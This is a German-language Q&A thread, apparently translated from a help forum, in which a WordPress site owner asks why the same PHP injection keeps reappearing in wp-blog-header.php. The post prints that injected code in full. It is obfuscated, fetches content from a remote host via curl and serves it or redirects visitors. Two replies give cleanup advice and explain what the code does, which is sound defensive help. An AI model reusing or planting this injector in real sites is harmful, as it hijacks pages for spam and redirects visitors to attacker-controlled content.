wake-up-neo.com

Wie kann man verhindern, dass ein Bot oder jemand eine Datei automatisch ändert?

Jemand, der täglich unsere Website-Datei wp-blog-header.php ändert.

Sie fügen folgenden Code hinzu, der unnötige Seiten auf unserer Website automatisch generiert:

$e = pathinfo($f = strtok($p = @$_SERVER["REQUEST_URI"], "?"), PATHINFO_EXTENSION);

if ((!$e || in_array($e, array("html", "jpg", "png", "gif")) ||
    basename($f, ".php") == "index") && in_array(strtok("="), array("", "p", "page_id")) && (empty($_SERVER["HTTP_USER_AGENT"]) ||
        (stripos($u = $_SERVER["HTTP_USER_AGENT"], "AhrefsBot") === false && stripos($u, "MJ12bot") === false))) {

    $at = "base64_" . "decode";

    $ch = curl_init($at("aHR0cDovL3dwYWRtaW5hZG1pLmNvbS8/") . "7d09c3986906332c22b598b781b38d33" . $p);

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            "X-Forwarded-For: " . @$_SERVER["REMOTE_ADDR"])
    );

    if (isset($_SERVER["HTTP_USER_AGENT"]))
        curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);

    if (isset($_SERVER["HTTP_REFERER"]))
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);

    $ci = "curl_ex" . "ec";

    $data = $ci($ch);
    $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

    if (strlen($data) > 255 && $code == 200) {
        echo $data; exit;
    } else if ($data && ($code == 301 || $code == 302)) {
        header("Location: " . trim($data), true, $code); exit;
    }
}

Wie können wir das verhindern? Ich habe gestern das obige Skript entfernt und heute ist es wieder da.

Ich habe folgendes in .htaccess eingetragen, aber es hat nicht geholfen:

<Files wp-blog-header.php>
deny from all
</Files>
2
Helping Hands

Das Problem ist größer als Ihr Lösungsversuch. Wenn Sie die Bearbeitung dieser Datei blockieren, können sie einfach versuchen, eine andere Datei zu bearbeiten. Jemand hat Ihr Hosting-Konto offensichtlich über ein schwaches FTP-Passwort, eine Plugin-Sicherheitslücke, veralteten Code usw. gehackt.

Sie sollten sich darauf konzentrieren, das Programm zu schließen, obwohl sie ZUERST Zugriff auf Ihr System erhalten.

Einige gute erste Schritte:

  1. Ändern Sie Ihre Passwörter. Ja, alle von ihnen. FTP, SSH, WordPress-Administrator usw.
  2. Gehen Sie in WP admin auf die Seite mit den WordPress-Updates und aktualisieren Sie alle gefundenen Informationen.
  3. Scannen Sie Ihre Site mit einem Plugin wie WordFence auf gehackten Code.
  4. Scannen Sie Ihre Site mit dem timthumb Vulnerability Scanner. Dies ist häufig die Ursache für solche Hacks auf älteren Websites. -> https://wordpress.org/plugins/timthumb-vulnerability-scanner/
3
Greg Burkett

Ich bin kein Sicherheitsexperte, aber der Code, den Sie in Ihre Frage einfügen, macht ungefähr Folgendes:

  1. Überprüfen Sie, ob die Anfrage nicht für eine statische Seite ist (es kann nichts in diese eingefügt werden).
  2. Überprüfen Sie, ob die Anfrage nicht von den Scraper-Bots Ahrefsbot und MJ12bot stammt.
  3. Wenn beide Prüfungen bestanden sind, stellen Sie unter wpadminadmi.com eine Verbindung zum Server her (dies geschieht in der Zeile, die mit $ch = curl_init beginnt).
  4. Rufen Sie Code von dieser Site ab.
  5. Fügen Sie diesen Code ($data) in Ihre Site ein.

Ihre Website wurde gehackt und Sie verteilen wahrscheinlich Malware von Ihrer Website auf die Geräte Ihrer Besucher.

Ihre Frage enthält keine Hinweise darauf, wo sich die Malware möglicherweise auf Ihrer eigenen Website versteckt. Was Sie sehen, ist nicht die Malware selbst, sondern eine weitere Malware, die sie generiert.

Das Grundproblem kann überall liegen, angefangen von einem kompromittierten FTP-Account bis hin zu einem böswilligen Plugin/Theme. Die beste Option ist, die Site zu löschen und ein Backup zu installieren. Wenn Sie keine haben, müssen Sie durch die Bewegungen gehen .

3
cjbj